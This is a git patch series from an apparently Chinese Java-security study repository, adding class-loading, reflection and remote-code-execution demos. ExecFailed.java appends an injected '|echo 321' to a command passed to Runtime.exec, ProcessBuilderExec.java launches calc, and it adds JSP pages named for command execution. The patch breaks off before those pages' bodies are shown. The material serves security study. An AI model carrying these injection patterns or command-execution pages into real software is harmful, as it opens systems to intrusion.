From 5400bca4ce5a10e483f533482dbced08b9b81973 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Tue, 30 Sep 2025 13:22:58 +0800 Subject: [PATCH 01/16] =?UTF-8?q?pref:=20=E6=9B=B4=E6=96=B0heapdump?= =?UTF-8?q?=E5=88=A9=E7=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JDBC/PostgreSql/src/main/java/Calc.java | 4 ++ .../src/main/java/com/test/DirectConnect.java | 4 ++ JDBC/PostgreSql/src/main/java/tmp.java | 4 ++ .../src/main/java/com/test/pojo/Baka.java" | 4 ++ .../src/main/java/com/test/study/Loader.java" | 4 ++ .../RceStudy/.gitignore" | 38 +++++++++++++++++++ .../RceStudy/.idea/vcs.xml" | 4 ++ .../RceStudy/.idea/workspace.xml" | 25 ++++++++++++ .../RceStudy/pom.xml" | 21 ++++++++++ .../src/main/java/com/test/ExecFailed.java" | 4 ++ .../java/com/test/ProcessBuilderExec.java" | 4 ++ .../RceStudy/src/main/webapp/WEB-INF/web.xml" | 7 ++++ .../RceStudy/src/main/webapp/index.jsp" | 5 +++ .../src/main/webapp/processBuilder.jsp" | 16 ++++++++ .../RceStudy/src/main/webapp/runtime.jsp" | 16 ++++++++ .../RceStudy/src/main/webapp/runtime2.jsp" | 16 ++++++++ .../src/main/java/com/test/pojo/Baka.java" | 4 ++ .../com/test/study/Reflection2Runtime.java" | 4 ++ .../com/test/study/ReflectionMethods.java" | 4 ++ .../main/java/com/test/study/Ways2Class.java" | 4 ++ README.md | 6 ++- 21 files changed, 196 insertions(+), 2 deletions(-) create mode 100644 JDBC/PostgreSql/src/main/java/Calc.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java create mode 100644 JDBC/PostgreSql/src/main/java/tmp.java create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" diff --git a/JDBC/PostgreSql/src/main/java/Calc.java b/JDBC/PostgreSql/src/main/java/Calc.java new file mode 100644 index 0000000..457adbd --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/Calc.java @@ -0,0 +1,4 @@ +package PACKAGE_NAME; + +public class Calc { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java new file mode 100644 index 0000000..2f55059 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java @@ -0,0 +1,4 @@ +package com.test; + +public class DirectConnect { +} diff --git a/JDBC/PostgreSql/src/main/java/tmp.java b/JDBC/PostgreSql/src/main/java/tmp.java new file mode 100644 index 0000000..9cd2166 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/tmp.java @@ -0,0 +1,4 @@ +package PACKAGE_NAME; + +public class tmp { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" new file mode 100644 index 0000000..0133f80 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class Baka { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" new file mode 100644 index 0000000..ca91bcc --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class Loader { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" new file mode 100644 index 0000000..d843f34 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" new file mode 100644 index 0000000..09b34af --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" @@ -0,0 +1,25 @@ + + + + + + + + + + { + "keyToString": { + "settings.editor.selected.configurable": "MavenSettings" + } +} + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" new file mode 100644 index 0000000..424e50d --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + RceStudy + war + 1.0-SNAPSHOT + RceStudy Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + RceStudy + + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" new file mode 100644 index 0000000..6a246db --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" @@ -0,0 +1,4 @@ +package com.test; + +public class ExecFailed { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" new file mode 100644 index 0000000..79e2065 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" @@ -0,0 +1,4 @@ +package com.test; + +public class ProcessBuilderExec { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +

Hello World!

+ + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" new file mode 100644 index 0000000..42b0a1e --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 13:04 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" new file mode 100644 index 0000000..eb37888 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 12:50 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" new file mode 100644 index 0000000..83d527d --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 12:56 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" new file mode 100644 index 0000000..0133f80 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" @@ -0,0 +1,4 @@ +package com.test.pojo; + +public class Baka { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" new file mode 100644 index 0000000..b09825a --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class Reflection2Runtime { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" new file mode 100644 index 0000000..8227c82 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class ReflectionMethods { +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" new file mode 100644 index 0000000..66b6977 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" @@ -0,0 +1,4 @@ +package com.test.study; + +public class Ways2Class { +} diff --git a/README.md b/README.md index 4bf4d31..afc5a5a 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,7 @@ - [Java基础](#Java基础) - [Java安全基础](#Java安全基础) -- [代码 / jar包调试](#代码 / jar包调试) +- [代码和jar包调试](#代码和jar包调试) - [反序列化](#反序列化) - CC链 - hessian @@ -107,7 +107,7 @@
-# 代码 / jar包调试 +# 代码 / jar包调试 一开始做ctf题的时候,遇到过很尴尬的情况,拿到jar包,不知道要怎么在本地调试。后面才学习到了反编译,远程调试等内容。 @@ -423,6 +423,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 主要是jdk自带的VisualVM看jdk版本,heapdump_tools分析依赖和密码 +[heapdump深度利用之信息泄露篇](https://mp.weixin.qq.com/s/VBCjtLxcdFvIJ0uK-sCdDw) + [Springboot信息泄露以及heapdump的利用_heapdump信息泄露-CSDN博客](https://blog.csdn.net/weixin_44309905/article/details/127279561) [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103?time__1311=eqUxuiDt5WqYqY5DsD7mPD%3DIZK7q9hGBbD&u_atoken=b94f9c93564049e1d2601ebb22a1098b&u_asig=0a472f9217433333617862864e004b) From 2509cf0872ee6c5e4dd88e851ffb27f0cac1f532 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Tue, 30 Sep 2025 13:23:38 +0800 Subject: [PATCH 02/16] =?UTF-8?q?pref:=20=E6=9B=B4=E6=96=B0Java=E5=8F=8D?= =?UTF-8?q?=E5=B0=84=E4=BB=A3=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ClassLoadStudy/.gitignore" | 38 +++ .../ClassLoadStudy/.idea/.gitignore" | 8 + .../ClassLoadStudy/.idea/encodings.xml" | 7 + .../ClassLoadStudy/.idea/misc.xml" | 14 + .../ClassLoadStudy/.idea/vcs.xml" | 6 + .../ClassLoadStudy/pom.xml" | 17 ++ .../src/main/java/com/test/pojo/Baka.java" | 15 + .../src/main/java/com/test/study/Loader.java" | 13 + .../RceStudy/.idea/encodings.xml" | 7 + .../RceStudy/.idea/misc.xml" | 14 + .../RceStudy/.idea/vcs.xml" | 4 +- .../RceStudy/.idea/workspace.xml" | 256 +++++++++++++++++- .../RceStudy/pom.xml" | 10 + .../src/main/java/com/test/ExecFailed.java" | 14 + .../java/com/test/ProcessBuilderExec.java" | 7 + .../src/main/webapp/processBuilder.jsp" | 32 ++- .../RceStudy/src/main/webapp/runtime.jsp" | 30 +- .../RceStudy/src/main/webapp/runtime2.jsp" | 54 +++- .../ReflectionStudy/.gitignore" | 38 +++ .../ReflectionStudy/.idea/.gitignore" | 8 + .../ReflectionStudy/.idea/encodings.xml" | 7 + .../ReflectionStudy/.idea/misc.xml" | 14 + .../ReflectionStudy/.idea/vcs.xml" | 6 + .../ReflectionStudy/pom.xml" | 25 ++ .../src/main/java/com/test/pojo/Baka.java" | 58 ++++ .../com/test/study/Reflection2Runtime.java" | 17 ++ .../com/test/study/ReflectionMethods.java" | 80 ++++++ .../main/java/com/test/study/Ways2Class.java" | 15 + 28 files changed, 778 insertions(+), 36 deletions(-) create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" create mode 100644 "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" new file mode 100644 index 0000000..9aa651d --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/pom.xml" @@ -0,0 +1,17 @@ + + + 4.0.0 + + com.test + ClassLoadStudy + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" index 0133f80..e20de74 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" @@ -1,4 +1,19 @@ package com.test.pojo; public class Baka { + public String name; + + static { + System.out.println("static block"); + } + + public Baka() { + System.out.println("no-arg constructor"); + } + + public Baka(String name) { + this.name = name; + System.out.println("name constructor"); + } + } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" index ca91bcc..1ec5f3c 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/study/Loader.java" @@ -1,4 +1,17 @@ package com.test.study; +import com.test.pojo.Baka; + public class Loader { + public static void main(String[] args) throws Exception { + Class bakaClass = Baka.class; + System.out.println("================="); + Class.forName("com.test.pojo.Baka"); // 触发static + System.out.println("=================="); + Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发 + System.out.println("================="); + Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static + System.out.println("=================="); + Baka baka = Baka.class.newInstance(); // 触发无参构造和static + } } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" index d843f34..c2365ab 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" @@ -1,4 +1,6 @@ - + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" index 09b34af..e70c20c 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" @@ -3,6 +3,60 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - { - "keyToString": { - "settings.editor.selected.configurable": "MavenSettings" + +}]]> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 1759207487740 + + + + + + + + + + jar://$PROJECT_DIR$/../../../../../../sec_software/jdks/jdk-1.8.0_65/src.zip!/java/lang/Runtime.java + 616 + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" index 424e50d..8f470e3 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" @@ -14,6 +14,16 @@ 3.8.1 test + + javax.servlet + javax.servlet-api + 4.0.1 + + + org.apache.commons + commons-io + 1.3.2 + RceStudy diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" index 6a246db..4ca8034 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" @@ -1,4 +1,18 @@ package com.test; +import org.apache.commons.io.IOUtils; + +import java.io.IOException; +import java.io.InputStream; + public class ExecFailed { + public static void main(String[] args) throws IOException { + String origin = "echo 123"; + String evil = "|echo 321"; + String cmd = origin + evil; + InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream(); + System.out.printf(IOUtils.toString(inputStream)); + // 123|echo 321 + // 以空格分割,空格后全是参数,所以管道符没用 + } } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" index 79e2065..fde706a 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" @@ -1,4 +1,11 @@ package com.test; +import java.io.IOException; + public class ProcessBuilderExec { + public static void main(String[] args) throws IOException { + String[] cmd = {"cmd", "/c", "calc"}; + ProcessBuilder processBuilder = new ProcessBuilder(cmd); + processBuilder.start(); + } } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" index 42b0a1e..e4a8e64 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" @@ -1,16 +1,18 @@ -<%-- - Created by IntelliJ IDEA. - User: snowstorm-maxy - Date: 2025/9/30 - Time: 13:04 - To change this template use File | Settings | File Templates. ---%> +<%@ page import="java.io.InputStream" %> +<%@ page import="java.io.ByteArrayOutputStream" %> <%@ page contentType="text/html;charset=UTF-8" 